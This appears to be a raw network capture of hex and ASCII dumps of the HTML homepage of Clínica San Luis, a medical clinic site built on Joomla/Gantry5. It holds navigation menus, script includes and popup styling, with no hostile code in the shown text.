                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC634INData Raw: 73 79 73 74 65 6d 2f 6a 73 2f 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 63 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 73 79 73 74 65 6d 2f 6a 73 2f 6d 6f 6f 74 6f 6f 6c 73 2d 6d 6f 72 65 2e 6a 73 3f 39 38 39 64 61 34 36 34 36 61 31 61 30 64 66 66 66 39 61 35 36 38 35 66 62 36 65 65 33 36 64 61 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63
                                                                                                                                                                                                                                                                                                      Data Ascii: system/js/core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-core.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src="/media/system/js/mootools-more.js?989da4646a1a0dfff9a5685fb6ee36da"></script><script src
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC636INData Raw: 6d 6c 35 73 68 69 76 2d 70 72 69 6e 74 73 68 69 76 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 65 6e 67 69 6e 65 73 2f 6e 75 63 6c 65 75 73 2f 63 73 73 2f 6e 75 63 6c 65 75 73 2d 69 65 39 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 74 63 68 6d 65 64 69 61 2e 70 6f 6c 79 66 69 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: ml5shiv-printshiv.min.js"></script> <link rel="stylesheet" href="/media/gantry5/engines/nucleus/css/nucleus-ie9.css" type="text/css"/> <script type="text/javascript" src="/media/gantry5/assets/js/matchmedia.polyfill.js"></script> <
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC637INData Raw: 69 63 61 2f 6c 6f 67 6f 5f 68 6f 72 69 7a 6f 6e 74 61 6c 2e 70 6e 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 36 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 65 6e 75 2d 38 36 30 35 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 6e 61 76 20 63 6c 61 73 73 3d 22 67 2d 6d 61 69 6e 2d 6e 61 76 22 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 64 61 74 61 2d 67 2d 68 6f 76 65 72 2d 65 78 70 61 6e 64 3d 22 74 72 75 65 22 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 74 6f 70 6c 65 76 65 6c 22 3e 0a 3c 6c
                                                                                                                                                                                                                                                                                                      Data Ascii: ica/logo_horizontal.png" alt="Clinica San Luis" /></a></div></div><div class="g-block size-63"><div id="menu-8605-particle" class="g-content g-particle"> <nav class="g-main-nav" role="navigation" data-g-hover-expand="true"><ul class="g-toplevel"><l
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC638INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 23 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 73 70 61 6e 3e 42 61 63 6b 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 65 71 75 69 70 6f 2d 6d 65 64 69 63 6f 2f 70 65 64 69 61 74 72 61 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75
                                                                                                                                                                                                                                                                                                      Data Ascii: -container" href="#" data-g-menuparent=""><span>Back</span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-215 "><a class="g-menu-item-container" href="/index.php/somos-especialistas/equipo-medico/pediatras"><span class="g-menu
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC640INData Raw: 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 70 65 63 69 61 6c 69 64 61 64 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 73 65 70 61 72 61 74 6f 72 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 30 20 67 2d 70 61 72 65 6e 74 20 67 2d 73 74 61 6e 64 61 72 64 20 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 64
                                                                                                                                                                                                                                                                                                      Data Ascii: nu-item-content"><span class="g-menu-item-title">Especialidades</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-separator g-menu-item-110 g-parent g-standard "><div class="g-menu-item-container" d
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC641INData Raw: 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 70 6f 6c 69 74 69 63 61 73 2d 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 6f 6c c3 ad 74 69 63 61 73 20 69 6e 73 74 69 74 75 63 69 6f 6e 61 6c 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 31 31 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f
                                                                                                                                                                                                                                                                                                      Data Ascii: stra-clinica/politicas-institucionales"><span class="g-menu-item-content"><span class="g-menu-item-title">Polticas institucionales</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-115 "><a class="g-menu-item-co
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC642INData Raw: 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 50 61 63 69 65 6e 74 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 70 61 72 65 6e 74 2d 69 6e 64 69 63 61 74 6f 72 22 20 64 61 74 61 2d 67 2d 6d 65 6e 75 70 61 72 65 6e 74 3d 22 22 3e 3c 2f 73 70 61 6e 3e 20 3c 2f 61 3e 0a 3c 75 6c 20 63 6c 61 73 73 3d 22 67 2d 64 72 6f 70 64 6f 77 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: item-container" href="/index.php/nuestra-clinica/nuestros-pacientes"><span class="g-menu-item-content"><span class="g-menu-item-title">Pacientes</span></span><span class="g-menu-parent-indicator" data-g-menuparent=""></span> </a><ul class="g-dropdown
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC644INData Raw: 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 39 36 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 65 64 75 63 61 63 69 6f 6e 2d 79 2d 70 72 6f 6d 6f 63 69 6f 6e 2d 70 61 72 61 2d 6c 61 2d 64 6f 6e 61 63 69 6f 6e 2d 64 65 2d 6f 72 67 61 6e 6f 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65
                                                                                                                                                                                                                                                                                                      Data Ascii: "g-menu-item g-menu-item-type-component g-menu-item-396 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/nuestros-pacientes/educacion-y-promocion-para-la-donacion-de-organos"><span class="g-menu-item-content"><span class="g-menu-ite
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC645INData Raw: 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 53 49 43 4f 46 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20
                                                                                                                                                                                                                                                                                                      Data Ascii: <span class="g-menu-item-title">SICOF</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC646INData Raw: 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 45 73 63 72 c3 ad 62 65 6e 6f 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e
                                                                                                                                                                                                                                                                                                      Data Ascii: m-content"><span class="g-menu-item-title">Escrbenos</span></span></a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-conten
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC648INData Raw: 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 35 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69
                                                                                                                                                                                                                                                                                                      Data Ascii: </a></li><li class="g-menu-item g-menu-item-type-component g-menu-item-385 "><a class="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC649INData Raw: 65 6c 20 6d 61 c3 b1 61 6e 61 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 74 66 6f 72 6d 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 73 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d
                                                                                                                                                                                                                                                                                                      Data Ascii: el maana</div></div> </div><div class="platform-content"><div class="moduletable "><style>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC650INData Raw: 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 6f 70 65 6e 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 45 66 66 65 63 74 09 3a 20 27 6e 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20
                                                                                                                                                                                                                                                                                                      Data Ascii: 'none', //elastic, fade or none openSpeed : 250, closeEffect: 'none', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC652INData Raw: 72 65 66 49 44 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 22 6e 6f 6e 65 22 3b 09 0d 0a 7d 0d 0a 66 75 6e 63 74 69 6f 6e 20 68 69 64 65 73 74 75 66 66 28 62 6f 78 69 64 29 7b 0d 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72
                                                                                                                                                                                                                                                                                                      Data Ascii: refID.style.display = "none";}function hidestuff(boxid){ document.getElementById(boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a hr
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC653INData Raw: 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                                                      Data Ascii: ass="g-animatedblock "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class=
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC654INData Raw: 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61
                                                                                                                                                                                                                                                                                                      Data Ascii: "><img src="/images/rocketlauncher/home/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-anima
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC656INData Raw: 79 6f 5f 64 69 61 67 6e 6f 73 74 69 63 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72 74 61 66 6f 6c 69 6f 5f 68 6f 6d 65 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 73 6f 6d 6f 73 2d 65 73 70 65 63 69 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c
                                                                                                                                                                                                                                                                                                      Data Ascii: yo_diagnostico.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="portafolio_home" href="/index.php/somos-especialistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> <
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC657INData Raw: 69 c3 b3 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65
                                                                                                                                                                                                                                                                                                      Data Ascii: in</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure class="g-promoimage-effect"><span class="g-promoimage
                                                                                                                                                                                                                                                                                                      2023-03-22 04:45:07 UTC658INData Raw: 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: "g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div>
